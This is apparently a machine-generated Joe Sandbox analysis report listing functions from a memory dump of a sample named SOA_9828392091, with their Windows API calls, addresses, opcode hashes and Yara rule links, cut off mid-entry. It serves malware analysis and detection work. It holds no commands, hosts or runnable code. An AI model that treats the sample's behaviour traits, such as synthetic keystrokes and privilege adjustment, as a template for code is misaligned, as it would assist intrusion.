                                      • Instruction ID: 4df5d87af1f81585129c2640d28f5c85876e3b82ec79860d48b8b3f4cfef6b47
                                      • Opcode Fuzzy Hash: 3bdfc01bba7ea7104a65f82799005b5eb19555c7f2e16f9b61f2af685231a69d
                                      • Instruction Fuzzy Hash: 3711C4726042009FD704EF28D885A2EB3E8FF84325F00895EF8A9D7291DB30BD008B91
                                      Function 0099F2D0 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,009AE44F,?,?,?), ref: 0099F344
                                        • Part of subcall function 0094B526: GetWindowLongW.USER32(?,000000EB), ref: 0094B537
                                      • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0099F32A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LongWindow$DialogMessageNtdllProc_Send
                                      • String ID:
                                      • API String ID: 1273190321-0
                                      • Opcode ID: fb121613200929073830b7a212d9898a2e2859898cdfb275151c3c538b8e064d
                                      • Instruction ID: 4f1d8f7d2ed7e316e1948786820b0b5dc0539ed9fdb87b67950b7dcc6f733b82
                                      • Opcode Fuzzy Hash: fb121613200929073830b7a212d9898a2e2859898cdfb275151c3c538b8e064d
                                      • Instruction Fuzzy Hash: 0101B131205204EBCF219F19DC95F7ABB7AFB89374F184524F9054B2E0C775A812EBA0
                                      Function 0099F689 Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ClientToScreen.USER32(?,?), ref: 0099F6AC
                                      • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,009AE52B,?,?,?,?,?), ref: 0099F6D5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ClientDialogNtdllProc_Screen
                                      • String ID:
                                      • API String ID: 3420055661-0
                                      • Opcode ID: ae792dbea2f349b2f4680900a2e30208cf46cf95991555b000e73fc0efa0ded5
                                      • Instruction ID: 104efe6ffa2bc142bc1b1222424f51277243bf17e791ef2457069586c38d0f4f
                                      • Opcode Fuzzy Hash: ae792dbea2f349b2f4680900a2e30208cf46cf95991555b000e73fc0efa0ded5
                                      • Instruction Fuzzy Hash: B6F03A72415218FFEF049F85DD099BEBFB9FF44311F14411AF901A2160D7B1AA51EBA0
                                      Function 0097CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0098BE6A,?,?,00000000,?), ref: 0097CEA7
                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0098BE6A,?,?,00000000,?), ref: 0097CEB9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorFormatLastMessage
                                      • String ID:
                                      • API String ID: 3479602957-0
                                      • Opcode ID: 5fe6e4d88350a004764b9358bf42b6584a8941ec0863a900813d8fe0f753ad2d
                                      • Instruction ID: 19097d322f6e49c1cb82a45e17ef520485106517ddb9cda72ee215e28d3da5dd
                                      • Opcode Fuzzy Hash: 5fe6e4d88350a004764b9358bf42b6584a8941ec0863a900813d8fe0f753ad2d
                                      • Instruction Fuzzy Hash: 31F0A771114229FBDB209FA4DC49FEA776DFF08361F008165F919D6181E7309E44CBA0
                                      Function 0097411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00974153
                                      • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00974166
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: InputSendkeybd_event
                                      • String ID:
                                      • API String ID: 3536248340-0
                                      • Opcode ID: 8793c712814ec9ff7291db1eb86231d6b14a797d9d68a15f3304ffc497bfae1c
                                      • Instruction ID: 64dcdb9e73cde0857d010cabfb8cd7d66c429c61bfc4eccd084910c9fe1fde13
                                      • Opcode Fuzzy Hash: 8793c712814ec9ff7291db1eb86231d6b14a797d9d68a15f3304ffc497bfae1c
                                      • Instruction Fuzzy Hash: 43F0907181434DAFDB059FA0C805BBE7FB4EF10315F008409F96596192D7B9C612DFA0
                                      Function 0096AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0096ACC0), ref: 0096AB99
                                      • CloseHandle.KERNEL32(?,?,0096ACC0), ref: 0096ABAB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AdjustCloseHandlePrivilegesToken
                                      • String ID:
                                      • API String ID: 81990902-0
                                      • Opcode ID: f5f0b5b484d0b9e1a76099efafeeaa051d1d237cfaaf5bdec5472c7632a36a85
                                      • Instruction ID: ab7268b28fffe596fb926b3592781cbcbb133f74270ca52433bfa1e91f964378
                                      • Opcode Fuzzy Hash: f5f0b5b484d0b9e1a76099efafeeaa051d1d237cfaaf5bdec5472c7632a36a85
                                      • Instruction Fuzzy Hash: EDE08631014511AFE7252F24EC04E7777EDEF043307108529F45980430D7225C90DB50
                                      Function 0099F7C3 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0099F7CB
                                      • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,009AE4AA,?,?,?,?), ref: 0099F7F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 2065330234-0
                                      • Opcode ID: 77d9c92fe0b3356e9ba30a7717e43d5126df181d384cd66a546741a509704576
                                      • Instruction ID: 3157c220474ecb905b84a20d47b4964902ffe019bedc0252eb59dbea43cc06d1
                                      • Opcode Fuzzy Hash: 77d9c92fe0b3356e9ba30a7717e43d5126df181d384cd66a546741a509704576
                                      • Instruction Fuzzy Hash: 39E08C30108219BBEB240F0DDC2AFB93B18EB00B60F108629F95A984E0E7B09890E660
                                      Function 009581AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00956DB3,-0000031A,?,?,00000001), ref: 009581B1
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009581BA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 912c936a1bfe871e89e03c12b922311fe144087bf1e0d72674a2898791229616
                                      • Instruction ID: 6e1c4a97f6e59f97b32f78d24ed37bd7f877f0e89ae853c5df092ad97381d991
                                      • Opcode Fuzzy Hash: 912c936a1bfe871e89e03c12b922311fe144087bf1e0d72674a2898791229616
                                      • Instruction Fuzzy Hash: A8B09231059608ABDB002BA1ED09B587FA8EB0866AF044120F60D44062AB735510AB92
                                      Function 009377B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: c3e2c17a6e80aabd69e4ceb3fbdb8d8b7f572c5a8f4f587a81c3092eb0004678
                                      • Instruction ID: 967ad5aaf3249f82d891dc338e9926d611183151c395c8275e304da27927d40d
                                      • Opcode Fuzzy Hash: c3e2c17a6e80aabd69e4ceb3fbdb8d8b7f572c5a8f4f587a81c3092eb0004678
                                      • Instruction Fuzzy Hash: F6A24BB0E04219CFDB24CF98C5906ADB7B5FF49324F2581A9E859AB390D7349E81DF90
                                      Function 00943B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Exception@8Throwstd::exception::exception
                                      • String ID: @
                                      • API String ID: 3728558374-2766056989
                                      • Opcode ID: 108a8eeea271d88bf05632794eba6ef2fb68378399dabc90a64744b4058efeed
                                      • Instruction ID: f41bc83873309cd46d0337a04806004a1af8dcbb67e7fcf72a96742e6af2f662
                                      • Opcode Fuzzy Hash: 108a8eeea271d88bf05632794eba6ef2fb68378399dabc90a64744b4058efeed
                                      • Instruction Fuzzy Hash: 7F72BE71E04209AFDF14DFA4C881FAEB7B9EF89300F14C459E915AB291D734AE45CB91
                                      Function 0095D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 87115979c6ccce1297230eb5dee45f4d4dd43507d43e8c52f52417e29f5dad47
                                      • Instruction ID: 919ace74e467a6d3014958c8f93baf24ddfa569ae483522012dd81b105605d0b
                                      • Opcode Fuzzy Hash: 87115979c6ccce1297230eb5dee45f4d4dd43507d43e8c52f52417e29f5dad47
                                      • Instruction Fuzzy Hash: 23320321D2AF014DD7239635C872336A29CAFB73D5F15D727E81AB59AAEF29C4C35200
                                      Function 009396C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __itow__swprintf
                                      • String ID:
                                      • API String ID: 674341424-0
                                      • Opcode ID: 62d115a0f374b1f3c56430a0a449c31029fae26178deb2ba21ef4e9902179edb
                                      • Instruction ID: ade15ad3ca0e871ca7c31793cc6517a2216b90c09f766d7e949e5710f4564bd8
                                      • Opcode Fuzzy Hash: 62d115a0f374b1f3c56430a0a449c31029fae26178deb2ba21ef4e9902179edb
                                      • Instruction Fuzzy Hash: 2C2266B16083019FD724DF28C891B6BB7E8BF85310F10491DF99A9B291DBB5E944CF92
                                      Function 0096038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e1f0d934b98babd19f0dab715d4ee2c9e04237d43345c0a363fdbb3458c052c5
                                      • Instruction ID: 35fa49e4d54bb7134774d926d7be5d8eec8862e6aef6c59da214d4ec46ef997c
                                      • Opcode Fuzzy Hash: e1f0d934b98babd19f0dab715d4ee2c9e04237d43345c0a363fdbb3458c052c5
                                      • Instruction Fuzzy Hash: 25B1DF20D3AF414DD32396398871336B65CAFBB2D5B92D71BFC1AB4D62EB2295C35180
                                      Function 0097B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                      • __time64.LIBCMT ref: 0097B6DF
                                        • Part of subcall function 0095344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0097BDC3,00000000,?,?,?,?,0097BF70,00000000,?), ref: 00953453
                                        • Part of subcall function 0095344A: __aulldiv.LIBCMT ref: 00953473
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Time$FileSystem__aulldiv__time64
                                      • String ID:
                                      • API String ID: 2893107130-0
                                      • Opcode ID: d2656040ba5dfcdc816842dcdb6f6426ca84b053b06584ef90b341e67e6a88f0
                                      • Instruction ID: c05a278b42bbadb09537d1b0364a54604a50ee776c394682d2630cf8e07e2adb
                                      • Opcode Fuzzy Hash: d2656040ba5dfcdc816842dcdb6f6426ca84b053b06584ef90b341e67e6a88f0
                                      • Instruction Fuzzy Hash: B72172726345108BC729CF28C491B62B7E5EB95320B64CE6DE4E9CF2C0CB78BA05DB54
                                      Function 009A044C Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 009A04F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 2065330234-0
                                      • Opcode ID: a380c4756e6f41e6fd613fcb884506571895cbe4d7977fe72f897ea765442c59
                                      • Instruction ID: 314e12ecd60a905584e915c546a7442429f55bf2dab8dce046f448074139ff6d
                                      • Opcode Fuzzy Hash: a380c4756e6f41e6fd613fcb884506571895cbe4d7977fe72f897ea765442c59
                                      • Instruction Fuzzy Hash: 6E110630204215BAFF249B2CCD15F7D3A98EBCBB20F208718FA125A1F2DA685D10A2D4
                                      Function 009A00AF Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B526: GetWindowLongW.USER32(?,000000EB), ref: 0094B537
                                      • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,009AE467,?,?,?,?,00000000,?), ref: 009A0127
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 2065330234-0
                                      • Opcode ID: 9ef7581ec4f812f4207f52f461f1728ccd80fbaeaa4f9e8eae73a1f6be9d8dfc
                                      • Instruction ID: 87f42a7f479437b7c0bf0bd2fa6ac12c789eb5bd81d104b45c300e3a86a5c3b7
                                      • Opcode Fuzzy Hash: 9ef7581ec4f812f4207f52f461f1728ccd80fbaeaa4f9e8eae73a1f6be9d8dfc
                                      • Instruction Fuzzy Hash: 0C01D471608118ABDF149F28DC4ABF93BAAEFC6324F044125FA5957192C335AC20D7E0
                                      Function 0099E9AF Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B526: GetWindowLongW.USER32(?,000000EB), ref: 0094B537
                                      • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0099E9F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
